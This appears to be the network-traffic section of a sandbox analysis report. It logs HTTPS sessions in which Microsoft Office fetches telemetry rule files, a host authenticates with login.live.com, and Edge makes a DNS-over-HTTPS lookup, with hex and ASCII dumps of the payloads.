                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        22192.168.2.54976213.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:32 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:32 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:32 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                        x-ms-request-id: d1e74057-c01e-0014-6563-3ba6a3000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234932Z-178bfbc474bnwsh4hC1NYC2ubs00000000rg00000000puu4
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:32 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        23192.168.2.54976113.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:32 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:32 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                        x-ms-request-id: d278da68-d01e-002b-0c18-3b25fb000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234932Z-r1d97b99577kk29chC1TEBemmg00000009fg00000000w4en
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:32 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        24192.168.2.54976640.126.31.71443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:33 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                        Content-Length: 3592
                                                                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                                                                        2024-11-20 23:49:33 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                        2024-11-20 23:49:34 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                        Expires: Wed, 20 Nov 2024 23:48:33 GMT
                                                                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        x-ms-route-info: C555_BAY
                                                                                                                                                                                                                                                        x-ms-request-id: a836a4a8-ac7f-4fc2-bebb-035c32c710fd
                                                                                                                                                                                                                                                        PPServer: PPV: 30 H: PH1PEPF00011E4B V: 0
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:33 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 1276
                                                                                                                                                                                                                                                        2024-11-20 23:49:34 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        25192.168.2.54976713.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:33 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:33 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                        x-ms-request-id: 63e0f5a8-701e-0032-207a-3ba540000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234933Z-178bfbc474bv7whqhC1NYC1fg400000000sg000000003632
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:33 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        26192.168.2.54977413.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:34 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:34 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                        x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234934Z-1777c6cb7549j9hhhC1TEBzmcc0000000a4000000000t405
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:34 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        27192.168.2.54977613.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:34 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:34 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:34 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                        x-ms-request-id: 76a157b4-e01e-00aa-258c-3aceda000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234934Z-1777c6cb754j8gqphC1TEB5bf80000000a5g00000000mmpr
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:34 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        28192.168.2.54977713.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:34 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:34 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 464
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                        x-ms-request-id: 302bdaed-601e-003e-338c-3a3248000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234934Z-1777c6cb754n67brhC1TEBcp9c0000000a7g00000000z57p
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        29192.168.2.54977813.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:34 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:34 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                        x-ms-request-id: 8b710333-301e-0020-767a-3b6299000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234934Z-178bfbc474bxkclvhC1NYC69g400000000h000000000qa6c
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        30192.168.2.549805172.64.41.34437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC247INHTTP/1.1 200 OK
